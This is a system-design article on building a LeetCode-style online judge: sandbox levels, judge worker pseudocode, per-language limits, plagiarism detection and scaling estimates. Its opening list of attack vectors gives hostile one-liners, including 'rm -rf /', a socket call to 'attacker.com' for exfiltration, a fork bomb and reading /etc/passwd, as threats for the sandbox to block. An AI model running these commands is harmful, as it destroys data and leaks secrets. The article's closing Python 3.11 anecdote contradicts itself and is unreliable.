System Design: Online Code Judge — How LeetCode Runs Your Code Safely at Scale


LeetCode processes over 1 million code submissions per day at peak contest times. Running untrusted code at that scale is a hard security problem.

You get the question in the interview: “Design an online code judge like LeetCode.” Users submit Python, Java, C++, or JavaScript. The system compiles and runs their code against hidden test cases. It returns: Accepted, Wrong Answer, Time Limit Exceeded, Memory Limit Exceeded, or Runtime Error. And it must handle malicious code safely.

This post works through the problem from first principles — from naive process spawning all the way to production-grade container sandboxing, queue-based judging, and scaling to millions of submissions.


1. The core challenge: untrusted code execution

Running arbitrary user code is extremely dangerous. Consider what a malicious user could submit:

Attack vectors in user-submitted code
  • import os; os.system("rm -rf /") — destroy the filesystem
  • while True: pass — infinite loop, CPU starvation
  • x = [0] * (10**12) — allocate 8 TB, crash the machine
  • import socket; socket.create_connection(("attacker.com", 443)) — exfiltrate data
  • import os; os.fork() repeated — fork bomb, exhaust process table
  • open("/etc/passwd", "r").read() — read host secrets

The system must be completely sandboxed: every submission runs in an isolated environment where it cannot harm the host system, other users, or the network.

The fundamental tension: you want fast execution (users hate waiting 10 seconds for results) but strong isolation (you cannot trust the code). These goals are in opposition — stronger sandboxing generally means more overhead.

2. Sandbox approaches (progressive)


Level 1 — Process-level isolation

Spawn the user's code as a child process with a timeout. Simple and fast — but extremely weak. The process still runs as a system user with access to the full filesystem and network.

subprocess.run(["python3", "solution.py"], timeout=5, capture_output=True)
Handles: CPU time limit (timeout)
Does not handle: filesystem access (rm -rf /), network access, memory exhaustion, reading /etc/passwd, fork bomb

Level 2 — chroot jail

Change the root directory for the process. The sandboxed process sees only a minimal directory tree — it cannot reach /etc, /home, or other host paths. Better, but shares the host kernel — a kernel exploit escapes the jail entirely.

Handles: CPU time limit, filesystem access (mostly)
Does not handle: network access, memory exhaustion, kernel exploits, fork bomb

Level 3 — Docker containers

Linux namespace isolation: filesystem (mount), network, and PID namespaces, plus user namespaces when enabled (Docker does not remap user IDs by default). Combined with cgroup resource limits. Each submission gets a fresh container that is destroyed after execution. This is production-viable for most judges.

docker run --rm \
  --network none \
  --memory 256m \
  --cpus 0.5 \
  --read-only \
  --pids-limit 64 \
  judge-runner:latest python3 solution.py
Handles: CPU limit (--cpus), filesystem isolation, network isolation (--network none), memory limit (--memory), fork bomb (--pids-limit)
⚠️ Partial: kernel exploits (shared kernel)

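
The Level 3 flags can be assembled programmatically so that every submission gets the same limits. The following is a minimal sketch, assuming a judge worker that shells out to the Docker CLI; the `SandboxLimits` class and the `docker_argv` helper are hypothetical names introduced for illustration, while the flags are the ones shown in the command above.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SandboxLimits:
    """Hypothetical container for per-submission limits."""
    memory_mb: int = 256
    cpus: float = 0.5
    pids: int = 64


def docker_argv(image: str, command: list[str],
                limits: SandboxLimits = SandboxLimits()) -> list[str]:
    """Build the argv for a single-use, locked-down container."""
    return [
        "docker", "run", "--rm",            # container is removed after it exits
        "--network", "none",                # no network access
        "--memory", f"{limits.memory_mb}m", # cgroup memory limit
        "--cpus", str(limits.cpus),         # CPU quota
        "--read-only",                      # read-only root filesystem
        "--pids-limit", str(limits.pids),   # caps process count (fork bombs)
        image, *command,
    ]


argv = docker_argv("judge-runner:latest", ["python3", "solution.py"])
print(" ".join(argv))
```

Building an argv list rather than a shell string means nothing derived from the submission is ever interpreted by a shell.
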
Level 4 — gVisor / Firecracker microVMs

gVisor implements a Linux-compatible kernel in Go running entirely in userspace. Syscalls from the sandboxed process go to gVisor's kernel, not the host kernel — a kernel exploit only escapes into gVisor, which is isolated. Firecracker (used by AWS Lambda) boots a full microVM in ~125ms using KVM hardware virtualization. Maximum isolation at near-container overhead.

Handles: CPU limit, filesystem isolation, network isolation, memory limit, fork bomb, kernel exploits (intercepted)


3. System architecture

The submission flows through seven stages before a verdict reaches the user.


🌐 Stage 1: Browser
User writes code in the online editor (Monaco or CodeMirror). On "Submit", the browser sends a POST request with the code, selected language, and problem ID. The browser then starts polling for the verdict — or opens a WebSocket for push notification.

Payload: { "code": "...", "language": "python3", "problemId": 42, "userId": "u_abc" }

4. Test case execution

“Special judge” programs are used when a problem has multiple valid answers, e.g. any valid topological sort of a graph. The special judge checks correctness rather than exact string equality.

For each test case the judge follows a strict loop:

Judge Worker — pseudocode
def judgeSubmission(submission, testCases):
  results = []
  for tc in testCases:
    container = spawnSandbox(submission.language)
    try:
      injectCode(container, submission.code)

      startTime = clock()                     # host-side clock
      startMem  = cgroupMemUsage(container)   # baseline before the run

      proc = runInContainer(container, stdin=tc.input, timeout=tc.timeLimit)

      elapsed  = clock() - startTime
      peakMem  = cgroupPeakMem(container) - startMem
      exitCode = proc.exitCode
      stdout   = proc.stdout
    finally:
      destroyContainer(container)             # always, even on crash

    if proc.timedOut:
      results.append({"status": "TLE", "tc": tc.id})
    elif peakMem > tc.memLimit:
      results.append({"status": "MLE", "tc": tc.id})
    elif exitCode != 0:
      results.append({"status": "RE", "tc": tc.id, "exitCode": exitCode})
    elif tc.specialJudge:
      ok = runSpecialJudge(tc, stdout)
      results.append({"status": "AC" if ok else "WA", "tc": tc.id})
    elif normalize(stdout) != normalize(tc.expected):
      results.append({"status": "WA", "tc": tc.id, "got": stdout})
    else:
      results.append({"status": "AC", "tc": tc.id, "time": elapsed, "mem": peakMem})

    if results[-1]["status"] != "AC":
      break   # early exit on first failure

  return summarize(results)

Measuring resource usage accurately:

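  • Wall time: measured by the host using clock_gettime(CLOCK_MONOTONIC) around wait4(), not self-reported by the process. CLOCK_REALTIME is unsuitable because it can jump when the system clock is adjusted
  • CPU time: read from cgroup cpuacct.usage (cgroup v1; on cgroup v2 use usage_usec in cpu.stat) after execution, which isolates pure compute time from I/O waits
  • Peak memory: read from cgroup memory.max_usage_in_bytes (cgroup v1; on cgroup v2 use memory.peak), the high-water mark during the entire run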
  • Output comparison: trim trailing whitespace, normalize line endings — many wrong answer bugs are whitespace issues
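
The output-comparison rule above can be sketched in a few lines. This is a minimal illustration, assuming "normalize" means unifying line endings, stripping trailing whitespace on each line, and dropping trailing blank lines; the exact rules a real judge applies are not stated here, and `outputs_match` is a hypothetical helper name.

```python
def normalize(output: str) -> str:
    """Unify line endings, strip trailing whitespace, drop trailing blank lines."""
    lines = output.replace("\r\n", "\n").replace("\r", "\n").split("\n")
    lines = [line.rstrip() for line in lines]
    while lines and lines[-1] == "":
        lines.pop()
    return "\n".join(lines)


def outputs_match(actual: str, expected: str) -> bool:
    """Compare two outputs after normalization."""
    return normalize(actual) == normalize(expected)


print(outputs_match("6\r\n", "6"))
print(outputs_match(" 6", "6"))
```

Leading whitespace is deliberately left alone in this sketch, so " 6" and "6" still differ; whether that is the right call depends on the problem's output format.
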

Special judges are separate programs that receive (input, expected_output, actual_output) and print OK or WRONG. Used for floating-point problems (accept output within 1e-6), multiple valid answers, or problems where the checker needs to verify a mathematical property.
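
As an illustration of the floating-point case, here is a minimal checker sketch. It assumes whitespace-separated numeric tokens and an absolute-or-relative tolerance of 1e-6; the function name `float_checker` and the tolerance rule are assumptions made for this example, not a description of any particular judge.

```python
import math


def float_checker(input_text: str, expected_output: str,
                  actual_output: str, tol: float = 1e-6) -> str:
    """Return "OK" if every number is within tolerance, else "WRONG".

    input_text is unused here; checkers for other problem types need it.
    """
    expected = expected_output.split()
    actual = actual_output.split()
    if len(expected) != len(actual):
        return "WRONG"
    for exp_tok, act_tok in zip(expected, actual):
        try:
            exp_val, act_val = float(exp_tok), float(act_tok)
        except ValueError:
            return "WRONG"
        # Reject nan/inf explicitly: comparisons against nan are always False.
        if not math.isfinite(act_val):
            return "WRONG"
        if abs(exp_val - act_val) > tol * max(1.0, abs(exp_val)):
            return "WRONG"
    return "OK"


print(float_checker("", "0.333333333", "0.3333334"))
print(float_checker("", "1.0", "nan"))
```

The explicit finiteness check matters: without it, an output of `nan` would slip through, because `abs(x - nan) > tol` evaluates to False.
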


5. Language-specific considerations

Python is 10–100× slower than C++ for the same algorithm. LeetCode gives Python 5× more time than C++ to make the judge fair across languages.

Each language has unique sandboxing requirements and performance characteristics:

Language | Time multiplier | Memory limit | Compilation | Key sandbox flags
C++ | 1× (baseline) | 256 MB | g++ -O2 -fsanitize=address,undefined | --read-only, seccomp profile
Java | 2× (JVM warmup) | 512 MB (JVM heap) | javac, then java -Xmx256m | SecurityManager, no exec()
Python | 5× (interpreter) | 256 MB | none (interpreted) | restrict os, subprocess, socket modules
JavaScript | | 256 MB | none (Node.js) | --no-experimental-fetch, block fs.writeFile

C++ — The most dangerous language to sandbox. Users can call system(), exec(), open arbitrary file descriptors. Mitigations:

  • Compile with -fsanitize=address,undefined to catch memory errors early
  • Apply a seccomp (secure computing) filter that allows only the syscalls a solution needs (for example read, write, brk, mmap, exit_group) and blocks execve, fork/clone, and socket
  • Strip the binary after compilation to remove debug symbols

Java — The JVM takes 200–300ms to start up. Subtract this from the measured time. Use -Xmx256m -Xms32m to control heap. The JVM’s built-in SecurityManager could block file I/O and network calls, but it was deprecated for removal in Java 17 and permanently disabled in JDK 24, so on current JDKs rely on container-level isolation (or a custom ClassLoader restriction) instead.

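Python — Restrict dangerous modules via a custom import hook or by setting their sys.modules entries to None, which makes later imports fail (merely deleting an entry does not help, because the next import reloads the module). Treat this as defense in depth only: in-process restrictions can be bypassed, so the container remains the real boundary. Running inside a Docker container with --read-only already prevents filesystem writes. The resource module can set RLIMIT_CPU and RLIMIT_AS from inside the process.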
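
The RLIMIT_CPU and RLIMIT_AS limits can be sketched as follows. This is a minimal example, assuming a Linux host; instead of calling the resource module from inside the submission, it applies the limits in the child just before exec via `preexec_fn`, a variation chosen here so the user's code cannot skip the call. The helper name `run_with_rlimits` and the specific limit values are assumptions for illustration.

```python
import resource
import subprocess
import sys


def run_with_rlimits(argv, cpu_seconds, address_space_bytes, wall_timeout):
    """Run argv with CPU-time and address-space limits applied to the child."""
    def apply_limits():
        # Runs in the child process between fork() and exec().
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_seconds, cpu_seconds))
        resource.setrlimit(resource.RLIMIT_AS,
                           (address_space_bytes, address_space_bytes))

    return subprocess.run(argv, capture_output=True, text=True,
                          timeout=wall_timeout, preexec_fn=apply_limits)


# A 4 GiB allocation under a 1 GiB address-space limit should fail.
result = run_with_rlimits(
    [sys.executable, "-c", "x = bytearray(4 * 1024**3)"],
    cpu_seconds=2, address_space_bytes=1024**3, wall_timeout=10,
)
print("exit code:", result.returncode)
```

These rlimits complement rather than replace the cgroup limits: RLIMIT_AS caps virtual address space, not resident memory, so the two numbers are not interchangeable.
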

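JavaScript (Node.js) — Node 20+ ships a permission model (--experimental-permission, later renamed --permission) that denies filesystem access and child-process spawning unless explicitly allowed; rely on the container's --network none for network isolation. Older versions: override require('fs').writeFile and require('net').connect in a wrapper script loaded with --require.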


6. Plagiarism detection

MOSS (Measure of Software Similarity) was developed by Alex Aiken in 1994, is hosted at Stanford, and is still the gold standard for academic plagiarism detection. It uses Winnowing fingerprinting.

Plagiarism detection runs asynchronously — it is not in the critical path of judging. After a submission is accepted, a background job compares it against other accepted solutions for the same problem.

Three approaches, increasing sophistication:

Token-based comparison — tokenize the code, map all identifiers to a canonical form, then compare token sequences using similarity metrics like Jaccard similarity or edit distance. Fast and immune to simple variable renaming, but fooled by reordered statements or inserted dead code.
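
A token-based comparison for Python submissions might look like the sketch below. It assumes the standard-library `tokenize` module as the tokenizer and Jaccard similarity over token trigrams as the metric; the function names, the "ID"/"NUM"/"STR" placeholders, and the trigram size are all choices made for this example.

```python
import io
import keyword
import tokenize

# Layout-only tokens that carry no program structure worth comparing.
SKIP = {tokenize.COMMENT, tokenize.NL, tokenize.NEWLINE,
        tokenize.INDENT, tokenize.DEDENT, tokenize.ENDMARKER}


def canonical_tokens(source: str) -> list[str]:
    """Tokenize Python source, replacing identifiers and literals with placeholders."""
    tokens = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type in SKIP:
            continue
        if tok.type == tokenize.NAME and not keyword.iskeyword(tok.string):
            tokens.append("ID")       # every identifier looks the same
        elif tok.type == tokenize.NUMBER:
            tokens.append("NUM")
        elif tok.type == tokenize.STRING:
            tokens.append("STR")
        else:
            tokens.append(tok.string)  # keywords and operators kept verbatim
    return tokens


def jaccard(a: list[str], b: list[str], n: int = 3) -> float:
    """Jaccard similarity over the sets of token n-grams."""
    grams_a = {tuple(a[i:i + n]) for i in range(len(a) - n + 1)}
    grams_b = {tuple(b[i:i + n]) for i in range(len(b) - n + 1)}
    if not grams_a and not grams_b:
        return 1.0
    return len(grams_a & grams_b) / len(grams_a | grams_b)


original = "def two_sum(nums, target):\n    seen = {}\n    return seen\n"
renamed = "def f(a, b):  # renamed\n    d = {}\n    return d\n"
print(jaccard(canonical_tokens(original), canonical_tokens(renamed)))
```

Because identifiers collapse to a single placeholder, the renamed copy produces the same token stream as the original.
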

AST comparison — parse both programs to their Abstract Syntax Trees, then compare tree structure. Variable names are ignored. Reordering independent statements may fool this. JPlag works in a related way: it compares token streams derived from the parsed program.

MOSS fingerprinting — select representative substrings (k-grams) from the program using the Winnowing algorithm, hash them, compare hash sets across submissions. Robust to reformatting, variable renaming, and statement reordering. The classic choice.
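
The fingerprinting idea can be sketched compactly. This is an illustration of the Winnowing technique only, not MOSS itself: it assumes CRC32 as the k-gram hash (a production implementation would typically use a rolling hash), small illustrative values for k and the window size w, and normalization limited to lowercasing and whitespace removal. Identifier renaming would have to be handled by a separate normalization step beforehand.

```python
import zlib


def fingerprints(text: str, k: int = 5, w: int = 4) -> set[tuple[int, int]]:
    """Return winnowed (hash, position) fingerprints of text."""
    cleaned = "".join(text.lower().split())   # drop case and all whitespace
    hashes = [zlib.crc32(cleaned[i:i + k].encode("utf-8"))
              for i in range(len(cleaned) - k + 1)]
    if not hashes:
        return set()
    span = min(w, len(hashes))                # short inputs: a single window
    selected = set()
    for start in range(len(hashes) - span + 1):
        window = hashes[start:start + span]
        smallest = min(window)
        # On ties, keep the rightmost minimum in the window.
        offset = span - 1 - window[::-1].index(smallest)
        selected.add((smallest, start + offset))
    return selected


def similarity(a: str, b: str) -> float:
    """Jaccard similarity of the two fingerprint hash sets."""
    hashes_a = {h for h, _ in fingerprints(a)}
    hashes_b = {h for h, _ in fingerprints(b)}
    if not hashes_a or not hashes_b:
        return 0.0
    return len(hashes_a & hashes_b) / len(hashes_a | hashes_b)


compact = "for i in range(n): total += nums[i]"
spread = "for i in range(n):\n    total   +=   nums[i]\n"
print(similarity(compact, spread))
```

Selecting one minimum per window keeps the fingerprint small while guaranteeing that any sufficiently long shared substring contributes at least one common hash.
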

Practical pipeline:
  1. Submission accepted → enqueue plagiarism job (low priority queue)
  2. Normalize code: strip comments, whitespace, rename variables to v1, v2...
  3. Compute MOSS fingerprint
  4. Compare against top-50 accepted solutions (by runtime similarity)
  5. If similarity > 85% → flag for human review
  6. Human reviewer confirms or dismisses the flag

Important: plagiarism detection is probabilistic and generates false positives. Many short solutions to the same problem are legitimately identical (there is only one way to write Two Sum with a hash map). Always have human review before taking action.

7. Scaling

~500 judge workers (peak) · ~100 submissions / second · 200ms warm container start

Judge Worker pool — autoscale on queue depth:

The queue depth (number of pending jobs) is the primary scaling signal. With Kubernetes HPA and a custom metrics adapter:

  • Queue depth > 50 → scale up workers
  • Queue depth < 5 for 5 minutes → scale down
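
The two thresholds above amount to a small decision rule with hysteresis. The sketch below shows only that logic; in a real deployment the HPA evaluates the metric declaratively, so the function name `scaling_decision` and the sample format are assumptions for illustration.

```python
SCALE_UP_DEPTH = 50            # scale up when the queue is deeper than this
SCALE_DOWN_DEPTH = 5           # scale down only when it stays below this...
SCALE_DOWN_WINDOW_S = 5 * 60   # ...for this many seconds


def scaling_decision(samples):
    """samples: list of (timestamp_seconds, queue_depth), oldest first."""
    if not samples:
        return "hold"
    latest_ts, latest_depth = samples[-1]
    if latest_depth > SCALE_UP_DEPTH:
        return "scale_up"
    window_start = latest_ts - SCALE_DOWN_WINDOW_S
    if samples[0][0] > window_start:
        return "hold"          # not enough history to cover the full window
    recent = [depth for ts, depth in samples if ts >= window_start]
    if all(depth < SCALE_DOWN_DEPTH for depth in recent):
        return "scale_down"
    return "hold"


print(scaling_decision([(0, 3), (150, 2), (300, 1)]))
print(scaling_decision([(0, 3), (300, 80)]))
```

The asymmetry is intentional: a single deep-queue sample triggers a scale-up, while scale-down requires five quiet minutes, which avoids thrashing during bursty contests.
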

Each worker handles one submission at a time. By Little's law, ~2s average execution time at 100 submissions/second keeps 100 × 2 = ~200 workers busy during a sustained contest peak; provisioning up to ~500 leaves headroom for bursts.

Warm container pool:

Cold-starting a Docker container takes 1–3 seconds (pulling layers, initializing the runtime). During peak load, this adds noticeable latency. Solution: maintain a pool of pre-started containers per language:

  • Worker picks up a warm container instead of cold-starting
  • Container is destroyed after one use (fresh container = no state leakage)
  • A separate pool manager continuously refills the warm pool

Container reuse (for trusted languages):

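For JavaScript with a locked-down runtime, the container can be reused across submissions. Between submissions: reset the sandbox directory and restart the Node.js process. This takes ~50ms, versus ~200ms to hand over a fresh warm container (and 1–3 seconds for a true cold start). Use this only when the language runtime can be reliably reset, because reuse gives up the no-state-leakage guarantee of single-use containers.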

Warm Container Pool — pseudocode
import asyncio

class WarmPool:
  def __init__(self, language, target_size=10):
    self.language     = language
    self.target_size  = target_size
    self.pool         = asyncio.Queue()
    self._refill_task = None

  def start(self):
    # Call from inside a running event loop; a coroutine invoked from
    # __init__ without being scheduled would never run.
    self._refill_task = asyncio.create_task(self._refill_loop())

  async def _refill_loop(self):
    while True:
      while self.pool.qsize() < self.target_size:
        c = await startContainer(self.language)
        self.pool.put_nowait(c)
      await asyncio.sleep(0.1)  # check every 100ms

  async def acquire(self):
    try:
      return self.pool.get_nowait()
    except asyncio.QueueEmpty:
      return await startContainer(self.language)  # cold start fallback

  def release(self, container):
    destroyContainer(container)  # never return to pool: single use

Geographic placement:

Judge workers should run in the same region as the users. A submission from a user in Singapore that is judged in Virginia has 150ms of network RTT added to the wait time — for a fast algorithm that finishes in 50ms, that is the dominant latency. Use CDN routing and regional worker deployments.


8. Interactive code judge demo

Mini Code Judge

Problem: Given an array of integers, return their sum. Input: space-separated integers. Output: a single integer.

Test cases
TC #1: 1 2 3 → 6
TC #2: 10 -5 → 5
TC #3: 0 0 0 → 0
TC #4: 100 → 100
TC #5: -1 -2 -3 → -6
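
The demo problem can be judged locally with a few lines of Python. This is a minimal sketch that uses only Level 1 process isolation (a child process with a timeout), so it is for trusted experiments only and must not be exposed to untrusted code. The `judge` function, the verdict strings, and the 5-second default limit are assumptions for illustration; the test cases are the five listed above.

```python
import subprocess
import sys
import tempfile
from pathlib import Path

TEST_CASES = [
    ("1 2 3", "6"),
    ("10 -5", "5"),
    ("0 0 0", "0"),
    ("100", "100"),
    ("-1 -2 -3", "-6"),
]


def judge(source: str, time_limit_s: float = 5.0) -> str:
    """Run a Python solution against every test case; stop at the first failure."""
    with tempfile.TemporaryDirectory() as workdir:
        script = Path(workdir) / "solution.py"
        script.write_text(source)
        for stdin_text, expected in TEST_CASES:
            try:
                proc = subprocess.run(
                    [sys.executable, str(script)],
                    input=stdin_text + "\n",
                    capture_output=True, text=True,
                    timeout=time_limit_s, cwd=workdir,
                )
            except subprocess.TimeoutExpired:
                return "Time Limit Exceeded"
            if proc.returncode != 0:
                return "Runtime Error"
            if proc.stdout.strip() != expected:
                return "Wrong Answer"
    return "Accepted"


GOOD_SOLUTION = "print(sum(map(int, input().split())))"
print(judge(GOOD_SOLUTION))
```

Memory Limit Exceeded is not detected here, since that needs the cgroup or rlimit measurements described in section 4.
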

9. Capacity estimate

Metric | Value
Submissions / day (LeetCode scale) | ~1 million
Peak submissions / second (contest) | ~100 / sec
Average execution time per submission | ~1–2 seconds
Judge workers needed (steady state) | ~200
Judge workers needed (peak burst) | ~500
Warm container pool size (per language) | ~50 containers
Container boot time (warm pool) | ~180–220 ms
Container boot time (cold start) | ~1.5–3 seconds
Code storage per submission (compressed) | ~5 KB avg
Total code storage per year | ~1.8 TB (1M/day × 365 × 5KB)
Result storage per submission | ~1 KB (verdict + per-test stats)
Total result storage per year | ~365 GB
Queue message size | ~2 KB (code + metadata)
Network bandwidth (queue + DB) | ~5 MB/s at peak

Scaling rule of thumb: (peak submissions/sec) × (avg execution time in seconds) = workers needed. At 100/sec × 2s average = 200 workers at steady state. Add 2.5× headroom for burst = 500 workers. Each worker is a single container, so this is 500 containers worth of CPU — roughly 250 vCPUs at 0.5 CPU per container.
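
The arithmetic behind these estimates is easy to reproduce. The sketch below recomputes the worker, vCPU, and storage figures from the inputs stated in the table, using decimal units (1 TB = 10^9 KB); the helper name `workers_needed` is introduced here for illustration.

```python
import math


def workers_needed(rate_per_s: float, avg_exec_s: float,
                   headroom: float = 1.0) -> int:
    """Little's law: busy workers = arrival rate x service time, times headroom."""
    return math.ceil(rate_per_s * avg_exec_s * headroom)


steady_workers = workers_needed(100, 2)          # sustained contest rate
burst_workers = workers_needed(100, 2, 2.5)      # with 2.5x burst headroom
burst_vcpus = burst_workers * 0.5                # 0.5 CPU per container

submissions_per_year = 1_000_000 * 365
code_tb_per_year = submissions_per_year * 5 / 1e9     # 5 KB each, KB -> TB
results_gb_per_year = submissions_per_year * 1 / 1e6  # 1 KB each, KB -> GB

print(steady_workers, burst_workers, burst_vcpus)
print(code_tb_per_year, results_gb_per_year)
```

Changing the average execution time from 2s to 1s halves every worker figure, which is why the per-language time multipliers have a direct effect on fleet size.
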

Summary: system design checklist

Online Code Judge — key decisions
Sandbox | Docker with --network none, --memory, --read-only, --pids-limit + seccomp profile
Queue | Redis Streams or AWS SQS: durable, at-least-once delivery, dead-letter queue for failures
Result delivery | WebSocket push via Redis pub/sub; polling as fallback
Time measurement | Host-side wall clock + cgroup cpuacct.usage; never trust self-reported time
Memory measurement | cgroup memory.max_usage_in_bytes (peak high-water mark)
Cold start latency | Pre-warm container pool of ~50 containers per language
Autoscaling | Kubernetes HPA on queue depth metric; scale up fast, scale down slow
Higher isolation | gVisor (runsc) for maximum security; Firecracker microVMs for VM-level isolation

LeetCode runs on AWS. Their judging infrastructure uses a combination of ECS (Elastic Container Service) and custom-built judge workers. The company processes over 1 million code submissions per day at peak contest times.

LeetCode’s infrastructure runs on Amazon ECS. Their judge workers are custom-built containers that receive jobs from an internal queue. At peak contest times — when tens of thousands of participants submit simultaneously — the queue acts as a buffer, absorbing burst load that would overwhelm a synchronous system. The warm container pool keeps perceived latency low even when the queue is deep: you wait for a worker, but once a worker picks up your job, the container is ready immediately.

The 2022 LeetCode Weekly Contest had a famous incident: a Python solution that should have TLE’d was accepted because Python 3.11 optimizations made an O(n³) solution fast enough. The community debated the validity for days.

The strictness of judging matters enormously for competitive programming. A 2022 incident: Python 3.11 introduced significant performance improvements (the “Faster CPython” project). Solutions that were accepted for years suddenly started failing after a Python version upgrade — and some O(n²) solutions that should have timed out started passing. Maintaining separate per-language time limits that account for interpreter version performance is a continuous maintenance burden.

gVisor (used by Google Cloud Run and App Engine) implements a Linux kernel in Go running in userspace. Syscalls from the sandboxed process go to gVisor’s kernel: even if the process exploits a kernel bug, it exploits gVisor, not the host OS kernel.

gVisor’s approach is elegant: instead of letting user processes talk to the Linux kernel directly (with all its exploitable surface area), gVisor interposes a userspace kernel. Every syscall from the sandboxed process is handled by gVisor’s Sentry component, written in Go, which either handles it internally or translates it to a safe subset of host syscalls. The attack surface shrinks from the entire Linux kernel to gVisor’s much smaller, memory-safe Go implementation. Google Cloud Run and Cloud Functions run on gVisor — it is production-hardened at planetary scale.